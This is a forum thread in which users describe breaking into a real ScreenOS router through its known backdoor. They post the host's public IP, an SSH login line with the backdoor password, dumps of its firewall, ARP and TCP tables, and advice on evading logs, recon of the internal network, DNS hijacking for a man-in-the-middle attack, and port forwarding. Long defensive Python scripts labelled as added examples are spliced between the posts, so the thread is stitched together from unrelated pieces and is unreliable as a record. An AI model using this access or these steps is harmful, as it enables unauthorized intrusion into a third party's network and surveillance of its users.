Ok guise let's commandeer this network for keks.

  1. #1
    Sophie Pedophile Tech Support
    You may recall my thread on ScreenOS router backdoors. http://niggasin.space/forum/technoph...list-by-sophie If you haven't read it already, you should; it's an interesting thread. Anyway, I SSH'd into a backdoored router to see if I could do anything interesting; I'm root so I can basically do anything I want. First I dropped all screens (firewall rules), then I was able to portscan the IP in question. Here are the results.


    Starting Nmap 6.47
    Nmap scan report for rrcs-24-213-214-22.nys.biz.rr.com (24.213.214.22)
    Host is up (0.023s latency).
    Not shown: 808 filtered ports, 189 closed ports

    PORT STATE SERVICE
    22/tcp open ssh
    8080/tcp open http-proxy
    8181/tcp open unknown

    Nmap done: 1 IP address (1 host up) scanned in 14.74 seconds


    The http-proxy service redirects from 24.213.214.22:8080 to 24.213.214.22:8181 which is a login screen, https://24.213.214.22:8181/index.html probably for remote access to the router via HTTPS. Querying the administrative configuration seems to corroborate this.


    HTTP Port: 8080, HTTPS Port: 8181
    TELNET Port: 23, SSH Port: 22
    Manager IP enforced: False
    Manager IPs: 0

    Address Mask Vsys
    ---------------------------------------- ---------------------------------------- --------------------
    Mail Alert: Off, Mail Server:
    E-Mail Address:
    E-Mail Traffic Log: Off
    Configuration Format: DOS
    Device Reset: Enabled
    Hardware Reset: Enabled
    Admin privilege: read-only (Remote admin has read-only privileges)
    Max Failed Admin login attempts: 3
    Lock admin accounts on auth failure: On, locking time 3 minutes
    HTTP redirect: true


    Also note how admin privilege says we should have "read only" privilege; well, that would be true if we logged in with a regular admin account, but the nature of the backdoor is that you log in as sys/root. There are also a number of devices connected to the router, as the arp table shows:


    usage: 6/1024 miss: 0
    always-on-dest: disabled
    -----------------------------------------------------------------------------------------
    IP Mac VR/Interface State Age Retry PakQue Sess_cnt
    -----------------------------------------------------------------------------------------
    192.168.55.255 ffffffffffff trust-vr/bgroup0 STS 0 0 1
    192.168.55.200 0000aafb5ea6 trust-vr/bgroup0 VLD 693 0 0 0
    24.213.214.21 0000ca000003 trust-vr/eth0/0 VLD 666 0 0 9
    192.168.55.105 7427eaf334d5 trust-vr/bgroup0 VLD 1180 0 0 2
    192.168.55.114 08000f678d32 trust-vr/bgroup0 VLD 494 0 0 2
    192.168.55.115 08000f678f4e trust-vr/bgroup0 VLD 313 0 0 2


    Now I was wondering, since we own the router and firewall, what would be the next logical step in securing the rest of the network? Feel free to SSH into the thing and come have a look.

    ssh -l administrator 24.213.214.22

    Password: <<< %s(un='%s') = %u

    Here's a list of basic commands.

    http://www.skullbox.net/screenos-cheat-sheet.php

    Here are some more obscure commands including those for displaying all commands available.

    http://www.cymru.com/gillsr/document...n-commands.htm
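The management settings quoted in this first post (no manager-IP restriction, management ports reachable from the outside) are the kind of thing a defender can audit mechanically. The following Python is an added example, not code from the thread or from Juniper: it parses a `get admin` dump in the format shown above into fields and reports exposure findings, and separately checks a `get system` software version string against the ScreenOS release range Juniper listed as affected by the unauthorized-access issue (advisory JSA10713, CVE-2015-7755: 6.3.0r17 through 6.3.0r20). The sample dump is constructed to mirror the output above; the severity rules and the function names are this example's own assumptions.

```python
"""Audit ScreenOS management settings for exposure (added example, not from the thread)."""
import re

# Constructed sample, shaped like the 'get admin' output quoted in the thread.
SAMPLE_GET_ADMIN = """\
HTTP Port: 8080, HTTPS Port: 8181
TELNET Port: 23, SSH Port: 22
Manager IP enforced: False
Manager IPs: 0

Address Mask Vsys
---------------------------------------- ---------------------------------------- --------------------
Mail Alert: Off, Mail Server:
E-Mail Address:
E-Mail Traffic Log: Off
Device Reset: Enabled
Admin privilege: read-only (Remote admin has read-only privileges)
Max Failed Admin login attempts: 3
Lock admin accounts on auth failure: On, locking time 3 minutes
HTTP redirect: true
"""

# Release range Juniper listed as affected by the ScreenOS unauthorized-access
# issue (JSA10713 / CVE-2015-7755): 6.3.0r17 through 6.3.0r20.
AFFECTED_BASE = (6, 3, 0)
AFFECTED_RELEASES = range(17, 21)


def parse_get_admin(text):
    """Split 'Key: value' lines into a dict; a line may hold several comma-separated pairs."""
    fields = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("-") or ":" not in line:
            continue
        # "HTTP Port: 8080, HTTPS Port: 8181" -> two pairs; a comma inside a
        # value ("On, locking time 3 minutes") is kept because no colon follows it.
        for pair in re.split(r",\s+(?=[A-Za-z][^:,]*:)", line):
            key, _, value = pair.partition(":")
            fields[key.strip()] = value.strip()
    return fields


def audit_admin(fields, externally_open_ports=()):
    """Return (severity, message) findings. externally_open_ports lists management
    ports seen open from the untrusted side, e.g. by an authorised external scan."""
    findings = []
    if fields.get("Manager IP enforced", "").lower() == "false":
        findings.append(("high", "management not restricted to manager IPs: any host that "
                                 "reaches a management port may attempt to log in"))
    for svc in ("TELNET", "HTTP", "HTTPS", "SSH"):
        port = fields.get(f"{svc} Port", "")
        if port.isdigit() and int(port) in externally_open_ports:
            severity = "high" if svc == "TELNET" else "medium"  # telnet is cleartext
            findings.append((severity, f"{svc} management port {port} reachable from outside"))
    if fields.get("Lock admin accounts on auth failure", "").lower().startswith("off"):
        findings.append(("medium", "admin lockout on authentication failure is off"))
    if not fields.get("Mail Server"):
        findings.append(("low", "no mail server: admin logins and lockouts are not reported"))
    return findings


def version_in_affected_range(version):
    """True if a 'Software Version' string such as '6.3.0r17.0' falls in the affected range."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)r(\d+)", version)
    if not m:
        return False
    base = tuple(int(x) for x in m.groups()[:3])
    return base == AFFECTED_BASE and int(m.group(4)) in AFFECTED_RELEASES


if __name__ == "__main__":
    fields = parse_get_admin(SAMPLE_GET_ADMIN)
    # Ports the thread's external scan found open on this box: 22, 8080, 8181.
    for severity, message in audit_admin(fields, {22, 8080, 8181}):
        print(f"[{severity}] {message}")
    print("affected release:", version_in_affected_range("6.3.0r17.0"))
```

On the dump in this post the script reports the missing manager-IP restriction and three externally reachable management ports; the version check is the quickest way for an operator of such a device to decide whether the box needs the fixed release before anything else.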
  2. #2
    LiquidIce Houston
    inb4 honeypot

    Nice job, SWIY.

    A word of caution though:

    SSH may also log your public key fingerprints even if you're using a password (I think it first tries pubkey auth, then password auth), so it might be wise to make sure you're not offering your pubkey fingerprint.

    As far as what to do next:

    You have access to the router. That's pretty fucking awesome. It's easier to explore the network if you're sitting on the router. You've got the arp table, routing table, dhcp entries. I've only worked with Cisco hardware, but I assume Juniper stuff has to include the same functionality, so you should be able to check out these files. One thing that comes to mind is to link entries from the arp table with the dhcp table and then find out the mfg of connected devices from their mac addresses. If you can access the NAT table, you can also deduce what services are connecting outside of the router (if NAT is even used) and get an idea of what kinda traffic is going in and out. This is all completely passive - you're not interacting with the network in any way so you shouldn't set off any IDS or anything.

    As far as active recon, I don't have any ideas right now.
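The caution above about offered public keys is worth seeing from the server side. OpenSSH's sshd, when run at LogLevel VERBOSE, records the fingerprint of each public key a client offers before falling back to password authentication, so a password login still leaves a key fingerprint in the log that an administrator can match against known identities. The following Python is an added example, not code from the thread or from any project; it correlates constructed sshd log lines by sshd child process id and attaches the offered fingerprints to the login that followed. The log lines, host name, addresses and fingerprint are all constructed.

```python
"""Correlate public keys offered during SSH logins with the logins that followed
(added example; constructed OpenSSH log lines, not from the thread)."""
import re
from collections import defaultdict

# Constructed sample: OpenSSH sshd at LogLevel VERBOSE records each public key a
# client offers, even when the session is finally authenticated by password.
SAMPLE_AUTH_LOG = """\
Jan 28 17:50:01 gw sshd[2311]: Failed publickey for administrator from 203.0.113.7 port 51022 ssh2: RSA SHA256:5Y8qWbB3uC1kF0e7nJxH2sT9vLpR4aM6dQzN0oE1iUg
Jan 28 17:50:02 gw sshd[2311]: Accepted password for administrator from 203.0.113.7 port 51022 ssh2
Jan 28 17:52:10 gw sshd[2350]: Accepted password for administrator from 198.51.100.9 port 40010 ssh2
Jan 28 17:55:42 gw sshd[2402]: Failed password for administrator from 198.51.100.9 port 40011 ssh2
"""

ATTEMPT = re.compile(
    r"sshd\[(?P<pid>\d+)\]: (?P<result>Accepted|Failed) (?P<method>\w+) for (?P<user>\S+) "
    r"from (?P<ip>\S+) port (?P<port>\d+) ssh2(?:: (?P<keytype>\S+) (?P<fp>SHA256:\S+))?"
)


def correlate_logins(lines):
    """Return one record per accepted login: user, source, method, and the fingerprints
    of every public key the same sshd child (same pid) saw before the accept."""
    offered = defaultdict(list)   # pid -> fingerprints offered so far
    logins = []
    for line in lines:
        m = ATTEMPT.search(line)
        if not m:
            continue
        pid = m.group("pid")
        if m.group("method") == "publickey" and m.group("fp"):
            offered[pid].append(m.group("fp"))
        if m.group("result") == "Accepted":
            logins.append({
                "user": m.group("user"),
                "source": f"{m.group('ip')}:{m.group('port')}",
                "method": m.group("method"),
                "offered_keys": list(offered[pid]),
            })
    return logins


if __name__ == "__main__":
    for rec in correlate_logins(SAMPLE_AUTH_LOG.splitlines()):
        print(rec)
```

The first session in the sample authenticated by password, yet the record carries the RSA fingerprint the client offered a second earlier; the second session offered no key and leaves only an address. Which of the two an investigator would rather have is the whole point of the caution in the post.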

  3. #3
    notreal Yung Blood
    "Now i was wondering, since we own the router and firewall what would be the next logical step in securing the rest of the network? "

    Get us some more info on the clients, see what's diddling around, what services, OSes they like etc.

    gj

    https://www.youtube.com/watch?v=cIzM9p3dUm8
  4. #4
    Sophie Pedophile Tech Support
    > inb4 honeypot
    >
    > Nice job, SWIY.
    >
    > A word of caution though:
    >
    > SSH may also log your public key fingerprints even if you're using a password (I think it first tries pubkey auth, then password auth), so it might be wise to make sure you're not offering your pubkey fingerprint.
    >
    > As far as what to do next:
    >
    > You have access to the router. That's pretty fucking awesome. It's easier to explore the network if you're sitting on the router. You've got the arp table, routing table, dhcp entries. I've only worked with Cisco hardware, but I assume Juniper stuff has to include the same functionality, so you should be able to check out these files. One thing that comes to mind is to link entries from the arp table with the dhcp table and then find out the mfg of connected devices from their mac addresses. If you can access the NAT table, you can also deduce what services are connecting outside of the router (if NAT is even used) and get an idea of what kinda traffic is going in and out. This is all completely passive - you're not interacting with the network in any way so you shouldn't set off any IDS or anything.
    >
    > As far as active recon, I don't have any ideas right now.

    "get nat"

    Didn't give me anything. "get dhcp" told me the DHCP server is enabled but:


    bgroup0: DHCP server is enabled
    Total 0 MACs are queued by DHCP relay.


    Truth be told I'm not much of a network engineer; furthermore, ScreenOS has other 'command' conventions than what I'm used to. Also:

    > Get us some more info on the clients, see what's diddling around, what services, OSes they like etc.

    I would, but first I'll be looking into some ScreenOS commands some more to actually get the thing to do what I want it to do. Any tips would be welcome.
  5. #5
    LiquidIce Houston
    Hm, I'll try to look into it soon. There's gotta be some way to read the tables :/ I mean Cisco IOS has all these tools to manually edit this info, so I can't believe Juniper OS doesn't have the same capabilities... but maybe it is. I've got like 1h of internet time a day, I'll try to get back to you.

    Did you make any progress?
  6. #6
    Sophie Pedophile Tech Support
    > Did you make any progress?

    I had some IRL matter to take care of today; tonight when I have a moment I'll play around with it some more.
  7. #7
    SBTlauien African Astronaut
    Is there any valuable data within this network, or is it just a network to play with?
  8. #8
    Sophie Pedophile Tech Support
    "get tcp" showed me this


    tcp checksum error: 11, tcp http ping: 0
    tcp user auth: 0, tcp unknown port 0
    tcp no more socket: 0, tcp syn pak error: 7522
    tcp socket full drop count: 331
    tcp ooo segs: 0, tcp ooo segs drop count: 0
    max ooo segs: 32, default max ooo segs 32
    Total sock: 5/64, debug remote port: 65535
    1: inuse: 1, mode: 0, state: 0, ifnum: -1, idle: 0, timer 0
    ::/8181, ::/0, window: 0/0/0
    2: inuse: 1, mode: 0, state: 0, ifnum: -1, idle: 0, timer 0
    ::/23, ::/0, window: 0/0/0
    3: inuse: 1, mode: 0, state: 0, ifnum: -1, idle: 0, timer 0
    ::/22, ::/0, window: 0/0/0
    47: inuse: 1, mode: 2, state: 4, ifnum: 0, idle: 0, timer 1(0/10)
    24.213.214.22/22, 95.141.29.38/2593, window: -172350114/-1651650253/16384
    50: inuse: 1, mode: 0, state: 0, ifnum: -1, idle: 0, timer 0
    ::/8080, ::/0, window: 0/0/0


    "get interface" showed me this.



    A - Active, I - Inactive, U - Up, D - Down, R - Ready

    Interfaces in vsys Root:
    Name IP Address Zone MAC VLAN State VSD
    serial0/0 0.0.0.0/0 Null N/A - D -
    eth0/0 24.213.214.22/30 Untrust 3c8a.b0af.2d80 - U -
    eth0/1 0.0.0.0/0 Null 3c8a.b0af.2d85 - D -
    eth0/3 0.0.0.0/0 Null 3c8a.b0af.2d87 - D -
    eth0/4 0.0.0.0/0 Null 3c8a.b0af.2d88 - D -
    eth0/5 0.0.0.0/0 Null 3c8a.b0af.2d89 - D -
    eth0/6 0.0.0.0/0 Null 3c8a.b0af.2d8a - D -
    bgroup0 192.168.55.1/24 Trust 3c8a.b0af.2d8b - U -
    eth0/2 N/A N/A N/A - U -
    bgroup1 0.0.0.0/0 Null 3c8a.b0af.2d8c - D -
    bgroup2 0.0.0.0/0 Null 3c8a.b0af.2d8d - D -
    bgroup3 0.0.0.0/0 Null 3c8a.b0af.2d8e - D -
    tun.1 unnumbered Trust ethernet0/0 - U -
    vlan1 0.0.0.0/0 VLAN 3c8a.b0af.2d8f 1 D -
    null 0.0.0.0/0 Null N/A - U -



    Dropped some system info. But guys, Jesus Christ, the documentation on ScreenOS including all commands is literally 900 pages long.



    PIN-ROCH-> get system
    Product Name: SSG5-Serial
    Serial Number: 0162112013000693, Control Number: 00000000
    Hardware Version: 0710(0)-(00), FPGA checksum: 00000000, VLAN1 IP (0.0.0.0)
    Flash Type: Samsung
    Software Version: 6.3.0r17.0, Type: Firewall+VPN
    Feature: AV-K
    BOOT Loader Version: 1.3.2
    Compiled by build_master at: Sun Apr 20 10:10:02 PDT 2014
    Base Mac: 3c8a.b0af.2d80
    File Name: screenos_image, Checksum: ca92f672
    , Total Memory: 256MB

    Date 01/28/2016 17:59:44, Daylight Saving Time enabled
    The Network Time Protocol is Disabled
    Up 1693 hours 48 minutes 40 seconds Since 19Nov2015:04:11:04
    Total Device Resets: 0

    System in NAT/route mode.

    Use interface IP, Config Port: 8080
    Manager IP enforced: False
    Manager IPs: 0

    Address Mask Vsys
    ---------------------------------------- ---------------------------------------- --------------------
    User Name: netscreen

    Interface serial0/0:
    description serial0/0
    number 21, if_info 1848, if_index 0
    link down, phy-link down, admin status up
    status change:0
    vsys Root, zone Null, vr untrust-vr
    admin mtu 0, operating mtu 1500, default mtu 1500
    *ip 0.0.0.0/0 mac 3c8a.b0af.2d95
    bandwidth: physical 92kbps, configured egress [gbw 0kbps mbw 0kbps]
    configured ingress mbw 0kbps, current bw 0kbps
    total allocated gbw 0kbps
    Interface ethernet0/0:
    description ethernet0/0
    number 0, if_info 0, if_index 0, mode route
    link up, phy-link up/full-duplex, admin status up
    status change:105, last change:01/27/2016 17:12:00
    vsys Root, zone Untrust, vr trust-vr
    dhcp client disabled
    PPPoE disabled
    admin mtu 0, operating mtu 1500, default mtu 1500
    *ip 24.213.214.22/30 mac 3c8a.b0af.2d80
    gateway 24.213.214.21
    *manage ip 24.213.214.22, mac 3c8a.b0af.2d80
    route-deny disable
    bandwidth: physical 100000kbps, configured egress [gbw 0kbps mbw 0kbps]
    configured ingress mbw 0kbps, current bw 0kbps
    total allocated gbw 0kbps
    Interface ethernet0/1:
    description ethernet0/1
    number 5, if_info 440, if_index 0
    link down, phy-link down, admin status down
    status change:0
    vsys Root, zone Null, vr untrust-vr
    admin mtu 0, operating mtu 1500, default mtu 1500
    *ip 0.0.0.0/0 mac 3c8a.b0af.2d85
    bandwidth: physical 0kbps, configured egress [gbw 0kbps mbw 0kbps]
    configured ingress mbw 0kbps, current bw 0kbps
    total allocated gbw 0kbps
    Interface ethernet0/2:
    description ethernet0/2
    number 6, if_info 528, if_index 0
    link up, phy-link up/full-duplex
    status change:1, last change:11/19/2015 04:11:06
    member of bgroup0
    vsys Root, zone Null, vr untrust-vr
    *ip 0.0.0.0/0 mac 3c8a.b0af.2d86
    Interface ethernet0/3:
    description ethernet0/3
    number 7, if_info 616, if_index 0
    link down, phy-link down, admin status up
    status change:0
    vsys Root, zone Null, vr untrust-vr
    admin mtu 0, operating mtu 1500, default mtu 1500
    *ip 0.0.0.0/0 mac 3c8a.b0af.2d87
    bandwidth: physical 0kbps, configured egress [gbw 0kbps mbw 0kbps]
    configured ingress mbw 0kbps, current bw 0kbps
    total allocated gbw 0kbps
    Interface ethernet0/4:
    description ethernet0/4
    number 8, if_info 704, if_index 0
    link down, phy-link down, admin status up
    status change:0
    vsys Root, zone Null, vr untrust-vr
    admin mtu 0, operating mtu 1500, default mtu 1500
    *ip 0.0.0.0/0 mac 3c8a.b0af.2d88
    bandwidth: physical 0kbps, configured egress [gbw 0kbps mbw 0kbps]
    configured ingress mbw 0kbps, current bw 0kbps
    total allocated gbw 0kbps
    Interface ethernet0/5:
    description ethernet0/5
    number 9, if_info 792, if_index 0
    link down, phy-link down, admin status up
    status change:0
    vsys Root, zone Null, vr untrust-vr
    admin mtu 0, operating mtu 1500, default mtu 1500
    *ip 0.0.0.0/0 mac 3c8a.b0af.2d89
    bandwidth: physical 0kbps, configured egress [gbw 0kbps mbw 0kbps]
    configured ingress mbw 0kbps, current bw 0kbps
    total allocated gbw 0kbps
    Interface ethernet0/6:
    description ethernet0/6
    number 10, if_info 880, if_index 0
    link down, phy-link down, admin status up
    status change:0
    vsys Root, zone Null, vr untrust-vr
    admin mtu 0, operating mtu 1500, default mtu 1500
    *ip 0.0.0.0/0 mac 3c8a.b0af.2d8a
    bandwidth: physical 0kbps, configured egress [gbw 0kbps mbw 0kbps]
    configured ingress mbw 0kbps, current bw 0kbps
    total allocated gbw 0kbps
    Interface bgroup0:
    description bgroup0
    number 11, if_info 968, if_index 0, mode nat
    link up, phy-link up/full-duplex, admin status up
    status change:1, last change:11/19/2015 04:11:06
    vsys Root, zone Trust, vr trust-vr
    dhcp client disabled
    PPPoE disabled
    admin mtu 0, operating mtu 1500, default mtu 1500
    *ip 192.168.55.1/24 mac 3c8a.b0af.2d8b
    *manage ip 192.168.55.1, mac 3c8a.b0af.2d8b
    route-deny disable
    bandwidth: physical 100000kbps, configured egress [gbw 0kbps mbw 0kbps]
    configured ingress mbw 0kbps, current bw 0kbps
    total allocated gbw 0kbps
    Interface bgroup1:
    description bgroup1
    number 12, if_info 1056, if_index 0
    link down, phy-link down, admin status up
    status change:0
    vsys Root, zone Null, vr untrust-vr
    admin mtu 0, operating mtu 1500, default mtu 1500
    *ip 0.0.0.0/0 mac 3c8a.b0af.2d8c
    bandwidth: physical 0kbps, configured egress [gbw 0kbps mbw 0kbps]
    configured ingress mbw 0kbps, current bw 0kbps
    total allocated gbw 0kbps
    Interface bgroup2:
    description bgroup2
    number 13, if_info 1144, if_index 0
    link down, phy-link down, admin status up
    status change:0
    vsys Root, zone Null, vr untrust-vr
    admin mtu 0, operating mtu 1500, default mtu 1500
    *ip 0.0.0.0/0 mac 3c8a.b0af.2d8d
    bandwidth: physical 0kbps, configured egress [gbw 0kbps mbw 0kbps]
    configured ingress mbw 0kbps, current bw 0kbps
    total allocated gbw 0kbps
    Interface bgroup3:
    description bgroup3
    number 14, if_info 1232, if_index 0
    link down, phy-link down, admin status up
    status change:0
    vsys Root, zone Null, vr untrust-vr
    admin mtu 0, operating mtu 1500, default mtu 1500
    *ip 0.0.0.0/0 mac 3c8a.b0af.2d8e
    bandwidth: physical 0kbps, configured egress [gbw 0kbps mbw 0kbps]
    configured ingress mbw 0kbps, current bw 0kbps
    total allocated gbw 0kbps
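The `get tcp` dump earlier in this post is also the place where an administrator of such a device would notice the intrusion: it lists the four management listeners (8181, 23, 22, 8080) and one established socket on port 22 with a remote peer. The following Python is an added example, not code from the thread or from Juniper; it parses that two-line-per-socket layout, separates listeners from sessions, and flags any session whose peer lies outside an allowlist of administrative networks. The sample uses constructed RFC 5737 addresses rather than the thread's, and the allowlist, the function names and the reading of `::` as an unbound endpoint are this example's assumptions.

```python
"""List ScreenOS 'get tcp' sockets and flag management sessions from unexpected sources
(added example; constructed sample, not the thread's own output)."""
import re
import ipaddress

# Constructed sample in the two-line-per-socket layout 'get tcp' prints in the thread:
# a status line, then "local/port, remote/port, window: ...". '::' is taken as unbound.
SAMPLE_GET_TCP = """\
Total sock: 5/64, debug remote port: 65535
1: inuse: 1, mode: 0, state: 0, ifnum: -1, idle: 0, timer 0
::/8181, ::/0, window: 0/0/0
2: inuse: 1, mode: 0, state: 0, ifnum: -1, idle: 0, timer 0
::/23, ::/0, window: 0/0/0
3: inuse: 1, mode: 0, state: 0, ifnum: -1, idle: 0, timer 0
::/22, ::/0, window: 0/0/0
47: inuse: 1, mode: 2, state: 4, ifnum: 0, idle: 0, timer 1(0/10)
192.0.2.22/22, 198.51.100.77/2593, window: 1/2/16384
50: inuse: 1, mode: 0, state: 0, ifnum: -1, idle: 0, timer 0
::/8080, ::/0, window: 0/0/0
"""

STATUS = re.compile(r"^(?P<idx>\d+): inuse: (?P<inuse>\d), .*state: (?P<state>\d+)")
ENDPOINTS = re.compile(r"^(?P<lip>\S+)/(?P<lport>\d+), (?P<rip>\S+)/(?P<rport>\d+), window:")


def parse_get_tcp(text):
    """Pair each status line with the endpoint line that follows it."""
    sockets, pending = [], None
    for raw in text.splitlines():
        line = raw.strip()
        s = STATUS.match(line)
        if s:
            pending = {"idx": int(s["idx"]), "inuse": s["inuse"] == "1", "state": int(s["state"])}
            continue
        e = ENDPOINTS.match(line)
        if e and pending is not None:
            pending.update(local=(e["lip"], int(e["lport"])), remote=(e["rip"], int(e["rport"])))
            sockets.append(pending)
            pending = None
    return sockets


def listeners(sockets):
    """Ports with no peer: the management services the box is offering."""
    return sorted(s["local"][1] for s in sockets if s["remote"] == ("::", 0))


def unexpected_sessions(sockets, allowed_sources):
    """Sockets with a concrete peer whose address is outside the allowed networks."""
    allowed = [ipaddress.ip_network(n) for n in allowed_sources]
    flagged = []
    for s in sockets:
        rip, _ = s["remote"]
        if rip == "::":
            continue
        if not any(ipaddress.ip_address(rip) in net for net in allowed):
            flagged.append(s)
    return flagged


if __name__ == "__main__":
    socks = parse_get_tcp(SAMPLE_GET_TCP)
    print("listening ports:", listeners(socks))
    for s in unexpected_sessions(socks, ["203.0.113.0/24"]):   # constructed admin network
        print(f"session to local port {s['local'][1]} from {s['remote'][0]}:{s['remote'][1]}")
```

Run periodically (or compared against the manager-IP list the box should have had enforced), this turns the one line in the dump that matters into an alert; the same parse also makes the telnet listener on port 23 hard to overlook.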
  9. #9
    Sophie Pedophile Tech Support
    Maybe I'll just let Nexpose scan the router with the credentials I provided; maybe that would make me any the wiser.
  10. #10
    Sophie Pedophile Tech Support
    > Is there any valuable data within this network, or is it just a network to play with?

    No clue, so far all I've been able to access is the router.
  11. #11
    Give me like 2 hours and I'll have every box on the network rooted
  12. #12
    Sophie Pedophile Tech Support
    > Give me like 2 hours and I'll have every box on the network rooted

    Teach me the ways of the force, master.
  13. #13
    LiquidIce Houston
    > Teach me the ways of the force, master.

    Sorry that I haven't posted anything yet, I just got back from traveling and I'm jet lagged back into 1999.
  14. #14
    Sophie Pedophile Tech Support
    > Sorry that I haven't posted anything yet, I just got back from traveling and I'm jet lagged back into 1999.

    No need to apologize, silly.
  15. #15
    LiquidIce Houston
    Interesting make-believe scenario.

    So there's not much going on in there it seems. No DHCP - maybe the hosts use static addressing? The arp'ed MACs show that there's probably a few PCs and a printer on the network. You could try scanning those IPs for open ports.

    Another thing that comes to mind is taking a snapshot of the current interface counters now and in like 24h to get an idea of how much data is moved through the network. Looking at the docs, you'd do this by


    get counter statistics interface ethernet0/0
    get counter statistics interface ethernet0/6


    I'm going by your latest info dump that specifies interfaces 0 and 6 as being up and all the others as being down.

    You could also do


    get dns host settings - Displays DNS servers and assigned interfaces
    get admin - Displays management information such as access ports and filtered IP addresses

    A DNS server/cache could be a trove of information or helpful in further steps in this game.
  16. #16
    Sophie Pedophile Tech Support
    Currently running a network audit with Nexpose with the credentials I provided; if nothing interesting comes up I'll run an asset discovery scan, and if that comes up with the local network I'll run a general audit on the devices on the network itself. Obviously I'll post the results here. Here's the info you requested.


    get dns host settings
    DNS Server:
    Primary : 24.92.226.11, Src Interface: ethernet0/0
    Secondary: 24.92.226.12, Src Interface: ethernet0/0
    Tertiary : 0.0.0.0, Src Interface: Null

    Refresh domain name IP Addresses:
    Never

    Normal UDP session: 0
  17. #17
    LiquidIce Houston
    > Currently running a network audit with Nexpose with the credentials I provided; if nothing interesting comes up I'll run an asset discovery scan, and if that comes up with the local network I'll run a general audit on the devices on the network itself. Obviously I'll post the results here. Here's the info you requested.
    >
    >
    >     get dns host settings
    >     DNS Server:
    >     Primary : 24.92.226.11, Src Interface: ethernet0/0
    >     Secondary: 24.92.226.12, Src Interface: ethernet0/0
    >     Tertiary : 0.0.0.0, Src Interface: Null
    >
    >     Refresh domain name IP Addresses:
    >     Never
    >
    >     Normal UDP session: 0

    GJ dude. The dns stuff doesn't look interesting, it's just using some default TWC dns servers I think. It does offer some chance of a mitm if you set up your own dns server and changed those settings to point to your dns server.
  18. #18
    Sophie Pedophile Tech Support
    > GJ dude. The dns stuff doesn't look interesting, it's just using some default TWC dns servers I think. It does offer some chance of a mitm if you set up your own dns server and changed those settings to point to your dns server.

    I'm trying to forward some ports; "set VIP multi-port" is the first command in a series you need to perform, but it told me the router had to be reset in order for the changes to take effect. I thought about it, but if there are people actively using the network and I reset the router remotely they might start to ask questions lel. Also, sadly, I don't have my own DNS server. Nexpose only got as far as the router; it did find some vulnerabilities related to the web interface of the thing but nothing too interesting, mostly certificate stuff.

    Now I usually do web app, so I have no idea how to get past the router into the network itself without forwarding ports, or if that's even the best way for that matter. Here's the documentation I could find on port forwarding, http://kb.juniper.net/InfoCenter/ind...tent&id=KB4740